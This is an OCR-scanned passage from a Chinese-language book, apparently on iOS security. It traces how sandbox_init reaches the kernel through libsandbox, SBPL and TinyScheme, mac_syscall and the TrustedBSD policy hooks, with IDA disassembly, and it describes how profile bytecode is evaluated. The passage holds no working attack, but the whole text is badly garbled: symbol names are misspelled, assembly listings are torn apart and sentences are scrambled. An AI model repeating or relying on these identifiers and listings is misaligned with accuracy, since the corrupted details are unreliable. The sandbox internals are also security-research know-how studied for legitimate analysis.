lazy binding information (from section records and indirect symbol table) : 
































segment section address index dylib symbol 
DATA la_symbol ptr 0x00003028 0x000B libSsSystem _execl 
DATA la_symbol ptr 0x0000302C 0x000D libSsystem FritE 
DATA la_symbol ptr 0x00003030 0x000E libSystem _getpid 
DATA la_ symbol ptr 0x00003034 0x000F libSystem 一 记 下 开罗 下 二 
DATA la_ symbol ptr 0x00003038 0x0010 libSystem _putenv 
DATA la_symbol _ ptr 0x0000303C 0x0011 libSsystem _Ssandbox_free error 
DATA la_symbol _ ptr 0x00003040 0x0012 libSsSystem _sandbox_ init 





可 以 预见 的 是 ，sandbox_init 经 由 1ibSystem 链 接 。iOS 使 用 的 大 多 是 预 链接 版 本 的 共享 
库 。 要 分 析 这 些 系 统 库 , 我 们 就 需要 将 其 从 缓存 中 提取 出 来 。 要 访问 该 缓存 ， 大 家 既 可 以 解密 固 
件 包 (IPSW ) 中 的 根 文件 系统 镜像 ， 也 可 以 从 已 经 越狱 的 Phone 上 复制 该 缓存 。 这 些 共 享 缓存 的 
位 置 是 /System/Library/Caches/com.apple.dyld/dyld_shared_cache armv7。 较 新 版 本 的 IDA Pro 可 以 
直接 解析 该 文件 ， 并 将 目标 库 提取 出 来 用 于 分 析 。 如 果 没 法 使 用 最 新 的 IDA Pro， 或 是 不 愿 去 使 
用 ， 大 家 也 可 以 使 用 开源 工具 dyla_dqecache 来 提取 这 些 库 ， 参 见 https:/github.com/kennytmy 
Miscellaneous/blob/master/dyld_decache.cpp。 我 们 还 有 其 他 选择 ， 详 见 http://theiphonewiki.com/wiki/。 
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如 果 只 是 自己 小 打 小 阅 ， 那 么 你 可 以 试 着 提取 以 下 库 : /usr/1lib/system/libsystem_ 
sandbox.dylib, /usr/lib/system/libsystem kernel.dylib 和 /usr/lib/libsandbox. 
1.dylipbp。 我 们 首先 要 看 的 是 libsystem sandbox.dylib。 5-2 展 示 了 从 libsystem_ 
sandbox 中 导出 的 符号 。 这 与 sandbox.h 的 定义 是 精确 匹配 的 。 相 信 大 家 已 经 找到 正确 的 库 了 ， 接 
着 你 可 以 开始 挖掘 sandqbox_init 及 其 子 函 数 的 反 编 译文 件 ， 弄 清楚 数据 是 如 何 进 入 内 核 的 。 











图 $-2 ”从 1libsystem_sandqdbox.dqylib 导 出 的 函数 





如 果 你 快速 审视 sandbox_ini 攻 ; 就 会 发 现 它 只 是 sanqbox ini t_internal 的 代理 函数 网 
检查 sandbox_init_with params 和 sandbox_init_with_extensions ,你 会 发 现 相同 结果 。 
这 3 个 函数 共享 了 相同 的 实现 。sandbox_init internal 展 示 了 有 趣 得 多 的 调用 图 ， 该 函数 的 
原型 如 下 所 示 : 


int sandbox_ init _ internal (const char *profile, uint64 t flags, const char* const 
parameters[], const char* const extensions[], char **errorbuf); 


首先 ， 该 函数 会 把 表示 参数 和 扩展 的 字符 串 数 组 转换 成 1ibsandbox 格 式 。 为 做 到 这 一 点 ， 
sandbox_init_internal 了 彤 数 会 动态 加 载 1ibsandbox.1. dylib 库 ， 并 按照 需求 解析 函数 调 
用 sandbox_create params 、sandbox_set _ param、sandbox_create_ extensions 和 
sandbox_adgd_extension )。 在 这 两 个 转换 之 后 ， 该 函数 会 复 用 fl1ags 的 值 : 
口 如 果 flags == 0， 就 调用 sandbox_compile_string， 然后 调用 sandbox_apply 和 
sandbox_free_profile。 这 一 功能 在 sandbox.h 头 文件 中 未 作 记 录 ; 
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口 如果 flags == SANDBOX_NAMED ， 就 调用 sandbox_compile_named， 人 然后 调用 
sandbox_ apply 和 sandbox_free profile; 

口 如 果 flags == SANDBOX_NAMED_BUILTIN， 就 直接 调用 _sandbox_ms; 

口 如 果 flags == SANDBOX_NAMED _EXTERNAL， 就 调用 sandbox_compile_file， 然 后 











调用 sandbox_apply 科 sandbox_free profile。 
所 需 的 这 些 函数 (除了 __sandbox_ms ) 也 都 是 从 1ibsandbox.1.dylipb 动 态 加 载 的 。 在 多 
数 情 况 下 ,Sandbox_ ini t_internal 会 为 对 sandbox_compile_* 和 sandbox_apply 的 调用 设 
置 参 数 。sANDBOX_NAMED_BUILTIN 的 情况 与 此 稍 有 不 同 。 它 调用 了 __sandbox_ms， 而 非 调 用 
libsandbox 中 的 浮 数 ,位 于 libsystem_kernel.dylib 中 的 ”sandbox_ms 是 用 户 空间 的 最 终 
位 置 。 它 利用 mac_syscall 系 统 调 用 陷入 内 核 。 该 系统 调用 是 由 TrustedBSD 子 系统 定义 的 (后 





























文 会 介绍 更 多 与 此 有 关 的 内 容 ): 
_ text:31D5DBA8 EXPORT _ _sandbox ms 
_ text:31D5DBA8 _ _sandbox_ms 
_ text:31D5DBA8 MOV R12, Ox1l7D ; _ mac_syscall 
_ text:31D5DBA8 ; sandbox_ ms 
_ text:31D5DBA8 ) mac _ syscall 
_ text:31D5DBBO SVC 0x80 


到 目前 为 止 ， 大 家 已 经 为 从 sandbox_init 出 发 的 一 条 路 径 找 到 了 内 核 入 口 点 。 现 在 ,我 们 
可 以 看 看 1ibsandbox 库 ,确定 其 他 路 径 是 什么 样子 以 及 它们 是 如 何 进 入 内 核 的 。 我 们 要 把 注意 
力 集中 在 sandbox_compile _* 和 sandbox_apply 限 数 上 。sandbox_create_extensions 和 
sandbox_create_parameters 国 数 只 是 管理 表 结构 的 〈 也 就 是 说 ， 它 们 很 没劲 )。 

sandbox_compile_string 与 sandbox_compile_file 捕 数 都 是 以 对 内 部 函数 compile 
的 调用 结束 的 , 不 过 前 者 是 compile 函 数 的 直接 代理 , 而 后 者 则 首先 会 检查 磁盘 上 的 缓存 。 在 iOS 
中 ， 对 应 缓存 的 基本 路 径 都 是 未 定义 的 ， 而 且 从 不 会 利用 到 缓存 的 代码 。 在 使 用 了 这 一 功能 的 
Mac OS X 中 ， 如 果 文 件 存 在 并 被 在 缓存 中 找到 ， 编 译 过 的 描述 文件 就 会 被 加 载 ， 该 本 数 返回 。 
而 从 本 书 的 角度 来 讲 ( 因为 我 们 只 关心 iOS )，compile 总 是 对 文件 的 内 容 调用 的 。 

sandbox_compile_named 会 查找 内 置 名 称 列表 。 如 果 相 应 参数 与 列表 中 的 某 一 名 称 匹配 ， 
它 就 会 被 复制 到 要 传递 给 sandbox_apply 的 结构 体 中 。 如果 传 人 的 名 称 不 在 已 知 描述 文件 之 列 ， 
在 失败 前 sandbox_compile_file 就 会 被 尝试 调用 。 这 就 已 经 涵盖 了 初始 化 函数 所 调用 的 全 部 
sandbox_ compile_ * 辆 数 。 

compile 限 数 把 沙 盒 描述 文件 转换 成 要 发 送 给 内 核 的 数据 结构 。 而 沙 盒 用 户 空间 端 多 数 有 意 
义 的 处 理 过 程 都 是 通过 该 函数 完成 的 。compile 会 使 用 开源 的 Scheme 解 释 器 TinyScheme 对 SBPL 
脚本 进行 评估 。 在 加 载 SBPL 进 行 编译 之 前 ， 我 们 要 载 人 3 个 不 同 的 Scheme 脚本 。 第 一 个 是 
TinyScheme 初 始 化 脚本 。Scheme 之 所 以 有 名 ， 是 因为 它 有 着 小 规模 的 核心 语言 ， 传 统 运行 时 语 
言 有 很 多 是 构建 在 这 个 核心 之 上 的 。 而 第 二 个 脚本 sbpl1_scm 定 义 了 SBPL 语 言 的 第 一 版 (也 是 
唯一 的 公开 版 本 )。 如 果 关 于 SBPL 的 细节 有 什么 问题 ， 你 可 以 看 看 该 脚本 的 内 容 。 第 三 个 脚本 
sbpl_scm 则 是 个 允许 加 载 多 版 本 SBPL 的 存根 。 目 前 ， 它 定义 了 任意 SBPL 肢 本 之 上 用 于 加 载 正 
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确 SBPL 前 序 ( 比如 sbp11_scnm ) 的 版 本 函数 。 这 一 存根 脚本 包含 了 用 于 描述 SBPL 评 佑 结果 的 开 
头 注 释 (header comment )。 该 脚本 很 容易 在 1ibsandbox.dylib 的 IDA 反 汇编 文件 中 找到 ， 而 在 





这 个 aylip 上 运行 字符 串 就 更 容易 了 。 这 3 个 Scheme 脚本 都 


;;;;;; Sandbox Profile Language stub 


是 很 容易 被 发 现 的 : 


;;; This stub is loaded before the sandbox profile is evaluated. When version 
;;; is called, the SBPL prelude and the appropriate SBPL version library are 


;;; loaded, which together implement the profile 
;;; a *rules* table that maps operation codes to 
RULE -> TEST | JUMP 

TEST -> (filter action . modifiers) 

; JUMP -> (#f . operation) 

;;; The result of an operation is decided by the 
;;; matches. Filter can be #t, in which case the 
;;; Causes evaluation to continue with the rules 














language. These modules build 
lists of rules of the form 


first test with a filter that 
test always matches. A jump 
for another operation. The 


;; last rule in the list must either be a test that always matches or a jump. 
最 终结 果 是 存储 在 *zules* 向 量 中 的 一 个 规则 列表 。 要 检查 是 否 允 许 进 行 某 一 操作 ， 内 核实 
施 模块 会 询问 该 *rules* 疝 量 。 被 检查 的 索引 对 应 着 要 测试 的 操作 。 例 如 ， 对 于 iOS 5.0 来 说 , 文 























件 读数 据 操作 就 是 15。 如 果 *rules* 向 量 的 第 16 项 是 (#f . 




















0) ， 那 么 任何 对 文件 读数 据 操作 的 检 


查 都 会 级 联 到 默认 规则 ( 默认 操作 是 索引 0 )。 这 与 注释 中 描述 的 roxp 情 况 是 对 应 的 。 数 据 项 可 








能 包含 的 是 规则 列表 。 在 这 种 情况 下 , 每 一 条 规则 会 被 按 次 








序 评 估 , 直到 遇 到 一 条 相 匹配 的 规则 。 





列表 最 后 总 是 包含 一 条 不 含 过 滤器 的 JUMP 规 则 ， 以 防 出 现 无 规则 相 匹 配 的 情况 。SBPL 语 言 是 用 
来 编译 该 决策 树 的 。 一 旦 得 出 该 树 ，1ibsandbox 中 的 compile 气 数 就 会 将 它 挫 平 ， 并 随 着 描述 


文件 的 字 节 码 被 传递 到 内 核 中 逐步 发 出 它 。 





sandqdbox_apply 是 另 一 个 通过 1ibsystem 中 的 初始 化 函数 进行 调用 的 主要 函数 。 该 函数 传 
递 了 由 编译 函数 创建 的 结构 体 , 而 这 一 结构 体 包 含 的 是 内 置 描述 文件 的 名 称 或 由 自 定 义 描 述 文件 
编译 成 的 字 节 码 。 它 还 可 能 含有 一 条 路 径 ， 存 储 操作 受 检查 的 记录 。 看 看 sandbox_apply， 大 




















家 会 发 现 两 条 主 路 径 是 以 对 _sanaqbox_ms 的 调用 结束 以 


。 一 条 路 径 打 开 了 记录 文件 ， 并 为 

















com.apple.sandbox 查 找 Mach 端 口 。 而 另 一 条 则 是 跳 转 于 
都 流 过 相同 的 内 核 人 口 点 了 。 














对 内 核 的 调用 。 现在， 所 有 的 初始 化 


本 章 之 前 讨论 过 的 其 他 配置 函数 ( 比如 签发 /销毁 扩展 的 函数 ) 则 直接 调用 sandbox_ms。 
至 此 ， 大 家 可 以 相信 所 有 的 用 户 数 据 都 是 通过 mac_syscall 进 入 内 核 了 。 























5.3.2 深入 内 核 


沙 盒 内 核 扩展 是 用 TrustedBSD 策 略 扩展 的 形式 实现 的 ， 
统 都 是 在 这 一 内 核 扩展 中 实现 的 。 首 先 ， 大 家 会 了 解 Trust 
着 ， 我 们 学 习 如 何 把 mac_syscal11 连 接 到 沙 盒 内 核 扩展 上 ， 














而 配置 实施 系统 和 描述 文件 实施 系 
edBSD 系 统 以 及 它 能 提供 些 什么 。 接 
弄 清楚 mac_syscall 是 如 何 进入 内 





核 以 及 它 在 沙 盒 中 是 在 哪里 得 到 处 理 的 。 最后， 我 们 重点 看 看 日 常 系统 调用 的 路 径 ， 了 解 沙 盒 


实施 机 制 。 


图 灵 社 区 会 员 cham1985 专 享 尊重 版 权 





5$.3 ”理解 沙 盒 的 实现 99 








如 果 打 算 自己 单独 弄 , 你 就 应 该 从 固件 包 中 提取 和 解密 内 核 缓存 。 

















以 预见 ， 
国 件 中 ， 
1. em st 


a 








完整 指导 详 见 第 10 章 。 可 


i 是 com.apple.security.sandbox 内 核 扩 展 。( 在 iPhone3,1 5.0 9A334 
一 扩展 是 从 0x805F6000 位 置 开 始 的 。) 








TrustedBSD 是 用 来 在 内 核 中 实现 可 插入 、 


可 组 合式 访问 控制 策略 的 框架 。 这 一 框架 是 由 遍布 


于 内 核 的 检查 点 ( inspection point ) 和 为 响应 这 些 事件 注册 策略 所 使 用 的 逻辑 组 成 的 。 很 多 系统 





调用 中 都 会 
权限 进行 检查 。 





于 策略 的 信 ， 象 的 方法 。 正 如 大 家 将 要 看 到 的 ,这 


ee be 在 允许 进一步 执 和 


系统 调用 之 前 ,将 会 对 





想 一 下 ,这 也 是 执 0 ( 见 第 4 章 )。 该 框架 还 提供 了 一 种 用 特定 
一 机 制 用 于 为 各 进程 存储 沙 盒 描述 文件 。 


沙 盒 策 略 扩展 只 用 到 了 这 一 宏大 框架 的 一 部 分 。 
XNU 中 实现 TrustedBSD 的 内 核 源 位 于 xnu-1699.24.8/security 中 。 用 于 实现 新 策略 模块 








的 接口 是 通过 mac _ policyh 公 开 的 : 


/** 
@ 文 件 mac_policy.h 
@ 概 要 MAC 策 略 模 块 的 内 核 接口 








本 头 文 件 定 义 了 由 Darwin 操 作 系 统 中 TrustedBSD MAC 框 架 定义 的 操作 清单 。 
向 该 框架 注册 MAC 策 略 模块 是 为 了 声明 对 某 组 特定 操作 的 关注 。 
如 果 未 声明 对 某 个 入 口 点 的 关注 ,那么 该 框架 评估 这 一 入 口 点 时 就 会 忽略 该 策略 
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这 一 开头 注释 含有 详尽 的 记录 ， 如 果 你 * 
该 注释 。 对 于 这 个 例子 而 言 ， 大 家 应 该 跳 过 

/** 


@ 概 要 MRAC 策 略 模块 注册 例 程 


调用 该 函数 是 为 了 向 MAC 框 架 注 册 策 略 。 





组 了 解 TrustedBSD 策 略 的 完成 功能 ,就 应 该 仔细 阅读 


寸 注册 函数 mac_policvy _ register: 


策略 模块 通常 会 从 Darwin 的 KEXT 注 册 例 程 调 用 该 函数 


Ti 
mac_policy_ handle t *handlep, 


正如 注释 中 提 到 的 , 该 函数 通 











mac_ policy register(struct mac policy _ conf *mpc, 
void *xd); 


常 是 从 策略 扩展 模块 的 kext_start 函 数 调 用 的 。 事实 上 ,1 


中 的 沙 盒 扩 展 一 开始 调用 的 就 是 mac_policy_register: 




















_ text:805F6DD0 sub_805F6DD0O 
_ text:805F6DD0 PUSH 
text:805F6DD2 MOV 

_ text:805F6DD4 LDR 
text:805F6DD6 BLX 

_ text:805F6DD8 CMP 

_ text:805F6DDA IT NE 

_ text:805F6DDC POPNE 

_ text:805F6DDE LDR 
text:805F6DEO MOVS 

_ text:805F6DE2 LDR 
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{R7,LR} ; Push registers 
R717, BP ; RA = Op2 
RO, =(sub_ 805FC498+1) ; Load from Memory 
RO ; sub_805FC498 
RO, #0 ; Set cond. codes on Opl - Op2 
; If Then 
{R7,PC} ; Pop registers 
RO, =off_805FE090 ; Load from Memory 
R2, #0 ; xd 
R1, =dword 805FE6C0 ; Load from Memory 
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_ text:805F6DE4 ADDS RO, #4 ; mpc 
_ text:805F6DE6 LDR R3, =(_mac_ policy register+1) 
_ text:805F6DE8 ADDS R1, #4 ; handlep 
_ text:805F6DEA BLX R3 ; _mac policy register 
_ text:805F6DEC POP {R7,PC} ; Pop registers 





_ text:805F6DEC 
寄存 器 调用 的 第 一 个 参数 是 一 个 指针 ， 指 向 用 于 配置 策略 的 mac_policy_conf 结 构 体 : 


struct mac_ policy_ conf { 


; End of function sub 805F6DD0 








oonst Char *mpc_name; 

const char *mpc_fullname; 

const char **mpc_labelnames; 
unsigned int mpc_labelname count; 
struct mac_policy_ops *mpc_ops; 

了 站 七 mpc_loadtime_ flags; 
工 向 臣 *mpc_field off:; 

i mpc_runtime_ flags; 
mpc_t mBe List: 

void *mpc_data; 


/xx 策略 名 称 */ 

/** 完整 名 称 */ 

/xx 受托 标签 命名 空间 */ 

/xx 受托 标签 命名 空间 的 数量 */ 
/** 操作 向 量 */ 

/xx 载 入 时 间 标 志 */ 

/xx 标签 槽 */ 

/xx 运行 时 标志 */ 

/xx* 链表 的 引用 */ 

/xx 模块 数据 */ 


在 iOS 扩 展 中 ， 该 结构 体位 于 off_805FE094 人 位置， 如 对 mac_policv_register 的 调用 中 





所 示 。 如果 你 想 亲 


"SandBox" 
__ data:805F 
_ data:805F 
__ data:805F 
__ data:805F 
__ data:805F 
__ data:805F 
__ data:805F 
__ data:805F 
_ data:805F 








E094 
E094 
E094 
E094 
E094 
E094 
E094 
E094 
E094 





Sbx_mac_policy _ conf DCD aSandbox_0 


DCD aSeatbeltSandbo 
DCD off_805FE090 

DCD 1 

DCD sbx_mac_policy _ ops 
Bey 六 

DCD qdqword_805FE6C0 

DECD & 

DCD: 0 

DCD. 已 
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动手 试 试 , 就 应 该 将 mac_policy_conf 和 mac_policy_ops 结 构 体 导 信 IDA 
Pro。 下 面 就 是 在 笔者 的 固件 中 找到 的 mac_policy_conf 结 构 体 : 


__ data:805FE094 


mpc_name ; 


mpc_fullname 
mpc_labelnames 
mpc_labelname_count 
mpc_ops 
mpc_loadtime_flags 
mpc_field off 
mpc_runtime_ flags 
mpc_list 

mpc_data 


配置 包含 了 用 于 TrustedBSD 策 略 的 唯一 名 称 ( Sandbox )， 以 及 更 长 一 些 的 描述 ( Seatbelt 
sandbox policy )。 它 还 含有 一 个 指针 ， 指 向 包含 有 函数 指针 表 的 另 一 个 结构 体 。 这 一 结构 体 就 是 





mac_policy ops， 它 的 作用 是 为 TrustedBSD 监视 的 各 种 事件 请 求 回 调 。 大 家 可 以 在 
xnu-1699.24.8/security/mac_policy.h:5971 中 找到 完整 的 结构 体 定义 。 正 如 在 之 前 的 
mac_policy_conf 中 定义 的 ，iO0S 的 mac_policy_ops 结 构 体 可 在 0x805FE0BC 位 置 找到 (在 笔 
者 的 IDB 中 定义 为 sbx_mac_policy_ops )。 该 结构 体 给 出 了 所 有 进入 沙 盒 策 略 扩 展 的 人 口 点 ， 
下 文 会 介绍 该 结构 体 中 的 两 个 函数 : 用 于 配置 进程 的 mpo_policy_syscal1 函 数 ， 以 及 用 来 在 
允许 进行 操作 前 对 操作 进行 验证 的 某 一 个 mpo_xxx_check_yyy 调 用 。 

2. 从 用 户 空 间 处 理 配 置 

大 家 之 前 已 经 了 解 了 由 TrustedBSD 公 开 给 策略 扩展 的 接口 ,现在 来 看 看 TrustedBSD 公 开 给 用 
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户 空间 的 接口 。 这 一 接口 是 在 xnu-1699.24.8/security/mac.h 中 定义 , 并 通过 xnu-1699.24.8/bsd/ 
kern/syscalls .master 公 开 的 : 















































380 AUE_MAC_EXECVE ALL { int _ mac execve(char *fname, char **argp, 
char **envp, struct mac *mac p); } 
381 AUE_MAC_SYSCALL ALL { int _ mac_ syscall(char *policy, int call, 
user_addr t arg); } 
382 AUE_MAC_ GET_ FILE ALL { int _ mac get _ file(char *path p, 
struct mac *mac_ p); } 
383 AUE_MAC_SET_FILE ALL { int _ mac_ set_file(char *path p, 
struct mac *mac_p); } 
384 AUE_MAC_GET_LINK ALL { int _ mac get link(char *path p, 
struct mac *mac _p); } 
385 AUE_MAC_SET_LINK ALL { int _ mac set link(char *path p, 
struct mac *mac_ p); } 
386 AUE_MAC_GET_PROC ALL { int _ mac get proc(struct mac *mac p); } 
387 AUE_MAC_SET_PROC ALL { int _ mac set proc(struct mac *mac p); } 
388 AUE_MAC_GET_FD ALL { int _ mac get fdl(int fd, struct mac *mac p); } 
389 AUE_MAC_SET_FD ALL { int _ mac_ set_ fdl(int fd, struct mac *mac p); } 
390 AUE_MAC_ GET_PID ALL { int mac_ get pid(piqd t pigd, 








struct mac *mac_p); } 

391 AUE_MAC_GET LCID ALL { int _ mac get_ lcid(pidqd t lcidqd, 

struct mac *mac _ p); } 

392 AUE_MAC_GET_ LCTX ALL { int _ mac get_ lctx(struct mac *mac p); } 
393 AUE_MAC_SET_ LCTX ALL { int _ mac_ set_ lctx(struct mac *mac p); } 


在 本 例 中 , 大 家 感 兴趣 的 是 mac_syscall 的 处 理 方 式 , 之 前 讨论 过 的 1ibsandbox 中 的 所 有 
用 户 空间 函数 最 后 都 要 调用 该 系统 调用 。 该 调用 是 提供 给 策略 扩展 , 让 它们 自行 动态 添加 系统 调 
用 的 。 第 一 个 参数 的 用 途 是 通过 mpc_name ( 对 于 沙 盒 而 言 ， 这 总 是 以 空 字符 结尾 的 字符 串 
“Sandbox”) 选择 策略 扩展 。 第 二 个 参数 是 用 来 选择 在 策略 中 调用 哪个 子 系统 调用 的 。 最 后 的 参 
数 voida * 表 示 任 何 参 数 都 可 以 传递 给 策略 的 子 系统 调用 。 

在 按 名 称 查找 策略 后 ，TrustedBSD 会 调用 由 相应 策略 定义 的 mpo_policy_syscal1 困 数 。 
在 我 们 的 固件 中 ,与 “Sandbox” 策 略 对 应 的 mpo_policy_syscall 消 数 指针 指向 的 位 置 是 
sub_805F70B4。 该 也 数 会 为 给 定 的 进程 处 理 所 有 的 沙 盒 配置 。 该 函数 是 审计 系统 调用 人 处理 和 解 
析 情 况 的 起 始 处 ， 大 多 数 不 受 信任 的 用 户 空间 数据 都 是 从 这 里 被 复制 到 内 核 中 的 。 

至 此 ， 内 核 与 用 户 这 两 端 已 经 相遇 了 。 大 家 可 以 循 着 对 sandbox_init 的 调用 ， 从 示例 程 
序 ， 经 过 1ibsandqbox， 再 到 陷 和 人 TrustedBSD 的 mac_syscal1， 最 终 再 到 沙 盒 内 核 扩 展 。 从 这 
一 点 上 讲 ， 如 果 你 是 要 寻找 内 核 bug， 审 计 来 自用 户 空间 的 不 受信 任 数据 的 路 径 ， 前 面积 累 的 
知识 已 经 够 用 了 。 不 过 从 另 一 方面 来 讲 ， 这 还 不 足以 让 我 们 绕 过 沙 盒 机 制 。 下 一 节 将 会 解决 这 
一 问题 ; 我 们 要 了 解 正常 的 系统 调用 穿越 沙 盒 的 路 径 ， 并 讨论 如 何 根据 进程 的 描述 文件 对 操作 
进行 评估 。 

3. 策略 的 实施 

在 前 文中 , mac_policy_ops 结 构 体 是 被 当做 某 次 TrustedBSD 特 有 的 系统 调用 的 直接 结果 接 
受 查询 的 。 该 结构 体 中 的 很 多 字段 在 进程 的 正常 操作 中 都 会 用 到 。TrustedBSD 挂 钩 被 小 心地 安插 
得 遍及 内 核 。 例 如, 在 xnu-1699.24.8/bsd/kern/uipc_syscalls.c 中 , 在 继续 处 理 进 程 的 绑 定 操作 之 前 ， 
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bind 系 统 调用 会 调用 mac_socket_check_bind 隐 数 : 


Li 攻 
bind(_ _ unused proc t p, 


{ 


struct bind args *uap, _ _ unused int32 t *retval) 











#if CONFIG MACF_SOCKET_ SUBSET 


if ((error = mac_socket_check bind(kauth cred get(), so, sa)) == 0) 
error = sobind(so, sa); 
#else 
error = sobind(so, sa); 


#endif /* MAC_SOCKET_SUBSET */ 
mac_socket_check_bindq 困 数 是 在 xnu-1699.24.8/security/mac_ socketc 中 定义 的 。 该 函数 用 
到 了 第 4 章 中 讨论 过 的 MAc_cHECK 宏 ， 它 当时 对 每 条 已 注册 的 策略 进行 迭代 ， 而 且 如 果 在 策略 的 
mac_pbpolicv_ ops 结 构 体 中 定义 了 mpo_socket_check_bind 国 数 ， 它 就 会 调用 该 函数 。 
int 
mac_socket_check_ bind(kauth cred _t ucredqd, 
struct sockaddr *sockaddr) 














struct socket *so, 


int error; 


if (!mac_socket_enforce) 


return 0; 





MAC_CHECK (socket_check bind, ucred, 
(socket_t)so, so->so_label, 
(error); 


sockaddr); 
return 


} 
沙 盒 扩 展 定 义 了 一 个 函数 ， 用 来 处 理 对 bind() 系统 调用 的 调用 。 我 们 这 里 的 固件 版 本 把 
mpo_socket_check_bindq 定 义 为 sub_805F8D54 ( +1 是 指示 要 切换 到 Thumb 模 式 ): 


__ data:805FE0OBC 





























DCD sub_805F8D54+1 ; mpo_socket_ check_ bind 


_ text:805F8D54 sub_805F8D54 ; 
com.apple.security.sandbox:_ data:sbx mac_ policy_opso 


DATA XREF: 











_ text:805F8D54 

_ text:805F8D54 var_C = -0xC 

_ text:805F8D54 

_ text:805F8D54 PUSH {R7,LR} ; Push registers 

_ text:805F8D56 MOV R7, SP ; Rd = Op2 

_ text:805F8D58 SUB SP, SP, #4 ; Rd = Opl - Op2 
_ text:805F8D5A MOV R2, RL + Rd = Op2 

_ text:805F8D5C MOVS R1, #0 ; Rd = Op2 

_ text:805F8D5E STR R1, [SP,#0xC+var_C] ; Store to Memory 
_ text:805F8D60 MOVS R1, #0x37 ; Rd = Op2 

_ text:805F8D62 LDR.W R12, =(sub_805FAS5D4+1) ; 
Load from Memory 

_ text:805F8D66 BLX R12 ; sub_805FA5D4 

_ text:805F8D68 ADD SP, SP, #4 ; Rd = Opl + Op2 
_ text:805F8D6A POP {R7,PC} ; Pop registers 

_ text:805F8D6A ; End of function sub_805F8D54 
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该 函数 只 会 在 传递 常量 0x37 时 执行 一 次 对 sub_805FA5D4 的 调用 。0x37 这 个 值 是 SBPL 的 
*rules* 问 量 的 索引 ,并 有 晶 对 应 着 network-bind 操 作 , 它 是 在 内 柚 于 libsandbox 的 sbpl1_scm 
脚本 中 定义 的 。 而 sub_805FA5D4 会 根据 当前 进程 的 描述 文件 对 network-pbind 操 作 进行 检查 。 
(大 家 很 快 就 会 看 到 这 一 检查 实际 上 是 怎样 执行 的 。) 根 据 描述 文件 检查 操作 的 代码 与 描述 文件 的 
格式 是 紧密 关联 的 ， 所 以 接 下 来 我 们 探讨 描述 文件 字 节 码 格式 的 细节 。 

4. 描述 文件 字 节 码 的 工作 方式 

在 讨论 SBPL 时 ， 大 家 了 解 了 *rules* 癌 量 ,， 以 及 决策 树 是 怎样 用 来 为 描述 文件 逻辑 编码 
的 。 该 决策 树 是 摊 平 的 ， 而 且 与 字符 串 及 正则 表达 式 存 储 在 一 起 ， 从 而 组 成 为 自 定义 ( 即 非 内 
置 的 ) 描述 文件 传递 给 内 核 的 描述 文件 字 节 码 。 内 置 描述 文件 有 着 sandboxd 守 护 进程 中 的 预 
编译 形式 。 在 用 内 置 描述 文件 对 进程 进行 沙 盒 处 理 时 ， 内 核 会 向 sandboxd 发 送 一 条 Mach 消 息 
索要 字 节 码 。 回 想 一 下 ， 自 定义 描述 文件 是 在 执行 初始 化 沙 盒 的 系统 调用 之 前 由 1ibsandabox 
编译 的 。 

当 内 核 接收 字 节 码 形式 的 描述 文件 时 , 它 会 解析 头 部 ,从 而 提取 某 些 过 滤器 中 要 用 到 的 正则 
表达 式 。 在 解析 了 正则 表达 式 并 将 其 存储 以 便 访问 后 , 该 正则 表达 式 缓存 与 字 节 人 码 会 被 存储 到 为 
沙 盒 扩展 保留 的 TrustedBSD 进 程 标记 中 。 在 借 由 TrustedBSD 框 架 进入 操作 检查 回调 时 ， 沙 盒 首先 
会 检查 是 否 有 描述 文件 与 当前 进程 相关 联 。 如 果 该 进程 具有 描述 文件 , 少 盒 就 对 字 节 码 进行 检索 ， 
并 对 若干 SBPL 操 作 进 行 评估 。 

实施 模块 是 从 决策 树 中 对 应 待 检查 操作 的 节点 开始 进行 评估 的 。 这 一 决策 树 是 行进 的 , 而 且 
每 次 转换 都 会 根据 与 节点 相关 联 的 过 滤器 作出 选择 。 我 们 继续 看 之 前 绑 定 的 例子 , 偏 移 量 为 0x37 
处 的 决策 节点 就 是 起 始 节 点 。 对 于 套 接 操作 而 言 ， 我 们 有 一 个 对 端口 号 范围 进行 匹配 的 过 滤器 。 
根据 过 滤器 条 件 是 否 得 到 满足 〈 会 为 这 两 种 可 能 性 提供 接 下 来 的 节点 )， 我 们 会 对 该 过 滤器 操作 
进行 检查 ， 并 采取 适当 的 转换 。 决 策 树 中 的 任何 节点 都 可 能 是 终结 节点 ; 在 入 口 之 上 , 我 们 不 会 
应 用 过 滤器 ， 但 会 作出 允许 或 拒绝 的 决定 。 

现在 大 家 对 内 核 如 何 进行 评估 已 有 了 大 致 的 了 解 ， 可 以 继续 研究 pinq 调 用 了 。 这 个 例子 是 
以 对 sub_805FA5D4 的 调用 结束 的 。 该 函数 从 进程 标记 加 载 沙 盒 ,然后 调用 sb_evaluate。 在 我 
们 所 用 的 内 核 缓 存 版 本 中 ，sb_evaluate 在 0x805FB0EC 人 位置。 该 函数 会 遍历 决策 树 ， 并 按照 先 
前 描述 的 那样 执行 对 操作 的 评估 。 这 是 个 很 大 很 复杂 的 函数 , 不 过 如 果 大 家 真 想 了 解 描述 文件 是 
如 何 进行 解释 的 , 那 该 函数 是 个 不 错 的 起 点 。 该 函数 还 可 以 用 来 找 出 哪个 内 核 操 作 映 射 到 了 哪个 
SBPL 操 作 。 这 种 映射 关系 不 是 一 对 一 的 。 

最 后 我 们 要 介绍 的 是 用 来 将 描述 文件 传送 给 内 核 的 二 进 制 格式 。 这 既 可 以 从 用 户 空间 部 分 为 
自 定义 描述 文件 创建 字 节 码 ( 1ibsandbox 中 的 compile ) 说 起 ， 也 可 以 从 处 理 描述 文件 的 内 核 
代码 说 起 。 在 内 核 端 ， 这 种 解析 分 为 正则 表达 式 解 析 代 码 和 sb_evaluate 的 代码 。 我 们 已 介绍 
过 这 种 格式 的 C 语 言 伪 代码 描述 。 描 述 文件 从 逻辑 上 讲 是 按照 决策 树 的 形式 排列 的 ， 描 述 文件 的 
评估 是 在 给 定 操 作 ( “这 个 进程 是 否 可 以 读 路 径 X 处 的 文件 ? ”) 的 前 提 下 完成 的 。op_table 说 
明了 每 个 操作 开始 的 节点 。 在 给 定 当 前 节点 和 所 尝试 操作 的 情况 下 , 评估 是 否 继续 是 根据 当前 节 
点 的 类 型 决定 的 。 如 果 节 点 是 结果 节点 ， 评 估 就 会 产生 结果 ( 允许 或 拒绝 )。 和 否则， 该 节点 是 决 
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策 节点 ， 可 能 对 操作 应 用 大 量 的 谓词 过 滤器 。 如 果 过 滤器 允许 或 匹配 了 所 尝试 的 操作 ， 当 前 的 节 
